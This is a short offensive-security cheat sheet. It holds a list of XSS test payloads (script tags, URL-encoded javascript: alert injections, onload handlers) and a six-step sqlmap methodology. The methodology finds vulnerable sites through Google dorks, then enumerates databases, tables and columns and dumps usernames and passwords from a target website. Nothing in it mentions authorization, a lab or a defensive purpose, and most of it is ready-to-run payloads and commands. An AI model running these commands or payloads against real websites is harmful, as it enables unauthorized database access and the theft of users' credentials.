XSS

XSS_Hackem

Test cases:

  • >”‘><script>alert(‘XSS’)</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background=”javascript:alert(([code])”></table>
  • <object type=text/html data=”javascript:alert(([code]);”></object>
  • <body onload=”javascript:alert(([code])”></body>

SQLmap

images (1)

Install

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

SQLmap methodology
1. Check target website if vulnerable to SQLMAP SQL Injection
Use Google dorks ( http://www.exploit-db.com/google-dorks/ ) and/or Web App Scanner

2. List databases
sqlmap -u http://[Target Website]/…php?id=7 –dbs

3. List tables
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] –tables

4. List columns
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] –columns

5. List usernames
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] -C [user_names_column] –dump

6. Extract password
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] -C [user_password_column] –dump